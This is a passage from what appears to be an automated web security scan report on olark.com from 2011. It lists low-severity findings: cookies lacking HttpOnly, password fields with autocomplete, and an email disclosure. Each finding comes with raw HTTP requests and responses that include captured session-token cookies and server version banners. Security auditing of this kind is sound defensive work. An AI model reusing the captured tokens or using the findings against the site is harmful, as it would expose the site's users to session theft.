Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_vs=1; km_lv=1307223781; km_uq=; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=41467b083c2e1887f5681ced3000506c; olarkld=1307223735932; _oklv=1307223782363; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.5.10.1307223738; __ar_v4=HYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A2%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A2%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A2

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:03 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "25c7afdb94b8a957ff7c3bb7d143b407"
X-Runtime: 173
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 22903
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiADoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6EWh0dHBfcmVmZXJlcjA6FXNwcmVl%0AZGx5X3BsYW5faWQw%0A; path=/
Set-Cookie: _habla_session_id=4a4413bdb3e119b507d8e8cb566381f4; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
<div class='span-16'>
<form action="/signup/create_new_account" id="create_new_account" method="post">

<ul class='label-top'>
...[SNIP]...
</label>
<input id="user_password" name="user[password]" size="30" type="password" />
</div>
...[SNIP]...
</label>
<input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" />
</div>
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.olark.com/about  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.olark.com
Path:   /about

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=cfe371dc86e5f42bfef191f5001b6531; olarkld=1307223735932; _oklv=1307223774815; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.2.10.1307223738; km_uq=1307223777%20%2Fe%3F_n%3DViewed%2520Features%26_k%3D3225b0c50e306468d63651238f71383a01850728%26_p%3DY8WuMkTtR3KKkCr5oWZY4tS0b10%26_t%3D1307223777; km_vs=1; km_lv=1307223777

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:42:58 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "bf3a914387de784c374aaea571cf9297"
X-Runtime: 94
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 11481
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=7ef543096fed838d853cbfba74a41ee4; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...

3.2. http://www.olark.com/account/login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.olark.com
Path:   /account/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/login HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; km_vs=1; km_lv=1307223777; km_uq=; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=8176dac3446661bf1abbb4cfa5ec84aa; olarkld=1307223735932; _oklv=1307223779753; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.4.10.1307223738

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:00 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "8cd3f804092786bb7afdfae4208d3d52"
X-Runtime: 13
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 11776
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=9f66e9a875d9b5043a20f0c3ecd19c68; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...

3.3. http://www.olark.com/features  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.olark.com
Path:   /features

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /features HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=c513f59f44580d12d329f635af1d80ac; olarkld=1307223735932; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; _oklv=1307223737388; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.1.10.1307223738; km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_vs=1; km_lv=1307223739; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_uq=; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:42:53 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "d327c6e4b616c33c9ebf28a4fa4b75dc"
X-Runtime: 115
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 20057
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=c5d9ef3db6c76a4d0ceccce8fc262d4c; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...

3.4. http://www.olark.com/plans  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.olark.com
Path:   /plans

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /plans HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.1.10.1307223738; km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_vs=1; km_lv=1307223739; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_uq=; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=cfe371dc86e5f42bfef191f5001b6531; olarkld=1307223735932; _oklv=1307223774815

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:42:56 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "73585166b16790be50ee1499d0c4e9a0"
X-Runtime: 482
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 34761
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=9df90f1a424b82574f97a9035ce3a5e8; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...

3.5. http://www.olark.com/signup/create_new_account  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.olark.com
Path:   /signup/create_new_account

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup/create_new_account HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_vs=1; km_lv=1307223781; km_uq=; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=41467b083c2e1887f5681ced3000506c; olarkld=1307223735932; _oklv=1307223782363; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.5.10.1307223738; __ar_v4=HYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A2%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A2%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A2

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:03 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "25c7afdb94b8a957ff7c3bb7d143b407"
X-Runtime: 173
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 22903
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiADoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6EWh0dHBfcmVmZXJlcjA6FXNwcmVl%0AZGx5X3BsYW5faWQw%0A; path=/
Set-Cookie: _habla_session_id=4a4413bdb3e119b507d8e8cb566381f4; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. http://www.olark.com/account/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.olark.com
Path:   /account/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /account/login HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; km_vs=1; km_lv=1307223777; km_uq=; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=8176dac3446661bf1abbb4cfa5ec84aa; olarkld=1307223735932; _oklv=1307223779753; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.4.10.1307223738

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:00 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "8cd3f804092786bb7afdfae4208d3d52"
X-Runtime: 13
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 11776
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=9f66e9a875d9b5043a20f0c3ecd19c68; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
<div class='prepend-2 span-9 colborder'>
<form action="login" id="loginform" method="post">
<ul class='label-left half_width'>
...[SNIP]...
</label>
<input id="password" name="password" type="password" />
<input id="old" name="old" type="hidden" />
...[SNIP]...

4.2. http://www.olark.com/signup/create_new_account  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.olark.com
Path:   /signup/create_new_account

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /signup/create_new_account HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_vs=1; km_lv=1307223781; km_uq=; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=41467b083c2e1887f5681ced3000506c; olarkld=1307223735932; _oklv=1307223782363; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.5.10.1307223738; __ar_v4=HYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A2%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A2%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A2

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:03 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "25c7afdb94b8a957ff7c3bb7d143b407"
X-Runtime: 173
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 22903
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiADoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6EWh0dHBfcmVmZXJlcjA6FXNwcmVl%0AZGx5X3BsYW5faWQw%0A; path=/
Set-Cookie: _habla_session_id=4a4413bdb3e119b507d8e8cb566381f4; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
<div class='span-16'>
<form action="/signup/create_new_account" id="create_new_account" method="post">

<ul class='label-top'>
...[SNIP]...
</label>
<input id="user_password" name="user[password]" size="30" type="password" />
</div>
...[SNIP]...
</label>
<input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" />
</div>
...[SNIP]...

5. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olark.com
Path:   /signup/create_new_account

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

POST /signup/create_new_account HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account
Content-Length: 279
Cache-Control: max-age=0
Origin: http://www.olark.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiADoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6EWh0dHBfcmVmZXJlciIzaHR0cDov%0AL3d3dy5vbGFyay5jb20vc2lnbnVwL2NyZWF0ZV9uZXdfYWNjb3VudDoVc3By%0AZWVkbHlfcGxhbl9pZDA%3D%0A; _habla_session_id=f43eeb0f5a3ea2cea377db3cb65c99cf; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1554307:2592000; olarkld=1307223735932; _oklv=1307224367147; __utmz=1.1307224367.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.773089205.1307224367.1307224367.1307224367.1; __utmc=1; __utmb=1.1.10.1307224367; km_vs=1; km_lv=1307224368; km_uq=; __ar_v4=HYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A7%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A7%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A6%7CZNKDW6EP2FASLMH6RLLWY3%3A20110604%3A1

